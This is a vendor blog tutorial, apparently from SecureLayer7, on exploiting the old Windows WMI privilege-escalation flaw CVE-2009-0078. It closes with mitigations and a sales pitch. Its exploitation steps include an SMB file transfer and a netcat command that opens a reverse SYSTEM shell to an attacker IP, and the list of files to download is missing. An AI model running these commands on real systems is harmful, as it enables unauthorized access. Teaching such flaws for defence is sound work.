If you’re interested in security and exploring vulnerabilities, you may have heard of the Windows WMI (Windows Management Instrumentation) Service Isolation Vulnerability.
This vulnerability can be used to gain local privilege escalation on Windows machines and can be exploited in various ways.
In this guide, we’ll go over how to exploit this vulnerability step-by-step, so you can better understand how it works and potentially protect yourself from future attacks.
But before exploiting local privilege escalation in the Windows Management Instrumentation Service. We must first define what Windows WMI Service Isolation is and know how it can be used.
The process of gaining elevated privileges or administrative access on a Windows operating system is referred to as privilege escalation. Although this is usually accomplished by exploiting system vulnerabilities or misconfigurations or using built-in tools and utilities to increase the privileges of an existing account.
Privilege escalation aims to circumvent security controls and gain access to sensitive information or resources that would otherwise be restricted. Besides, this is frequently a critical step in penetration testing and cyber-attacks.
The use of Windows Management Instrumentation (WMI) for privilege escalation is a niche topic in Windows privilege escalation. WMI is a Windows management technology that provides a unified interface for accessing network information and resources. Further, it can be used to gather system information, configure and manage services, and carry out other administrative tasks.
WMI can be used to execute malicious code with elevated privileges in the context of privilege escalation, allowing an attacker to escalate their privileges on the system. Hence, this is accomplished by abusing WMI event subscriptions, which are used to trigger actions based on specific system events.
An attacker can create a WMI event subscription that executes malicious code, allowing them to gain administrative privileges on the target system.
To demonstrate a practical scenario, we will use CVE-2009-0078, also known as MS09-012. But first, what exactly is CVE-2009-0078? And how can it be detected on a Windows server?
The Windows Management Instrumentation (WMI) provider present in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 have been found to lack proper implementation of isolation between a set of distinct processes that run either under the NetworkService account or under the LocalService account.
If the CVE-2009-0078 vulnerability exists in a system, then the Two separate processes running under the same account have full access to each other’s resources, such as file handles, registry keys, handles, etc. The WMI provider host process holds SYSTEM Tokens in certain scenarios. Furthermore, an attacker gains access to a computer under the context of a NetworkService or LocalService account. In that case, the attacker can execute code to probe the WMI provider host processes for SYSTEM tokens.
The “Windows WMI Service Isolation Vulnerability” is a critical security flaw that allows local users to gain privileged access to the resources of one of the processes running on a Windows system. This vulnerability can be exploited in order to bypass security protocols and gain unauthorized access to sensitive data or carry out malicious activities.”
Once a SYSTEM token is found, the attacker’s code can use it to gain SYSTEM-level privileges.
To detect the CVE-2009-0078 vulnerability in a Windows Server we first have to check the operating system version manually:
systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”
The prerequisites for exploiting the Windows WMI Service Isolation Vulnerability (CVE-2009-0078) addressed by Microsoft Security Bulletin MS09-012 are:
After detection, it’s time to understand exploitation, the most important phase.
On the attacker’s machine, download the following files:
These files should be downloaded onto the attacker’s machine in order to carry out the exploit.
Enter the below command to transfer the above files into the victim machine using SMB share.
sudo smbserver.py hello.
Copy the pr.exe and nc.exe into the victim’s machine.
Run the below command in the victim machine.
pr.exe “netcat.exe 10.10.16.6 1234 -e cmd.exe”
We were able to elevate CVE-2009-0078 successfully.
Let’s learn about mitigations.
The Windows Management Instrumentation (WMI) Service Isolation Vulnerability is a serious security issue allowing attackers to execute malicious code with elevated privileges.
To help protect against this vulnerability, it is recommended to install the latest security updates from Microsoft, disable the WMI service if it is not needed, use application control and whitelisting, enable User Account Control (UAC), and use up-to-date antivirus software.
Additionally, regularly updating your software and operating system is crucial to ensure that your system is protected against the latest security threats. However, these mitigation steps can reduce the risk of exploitation and help keep your system secure.
Don’t wait for a cyber attack to strike! Protect your system with SecureLayer7’s top-notch cybersecurity solutions. Say goodbye to sleepless nights worrying about the WMI vulnerability and other security threats.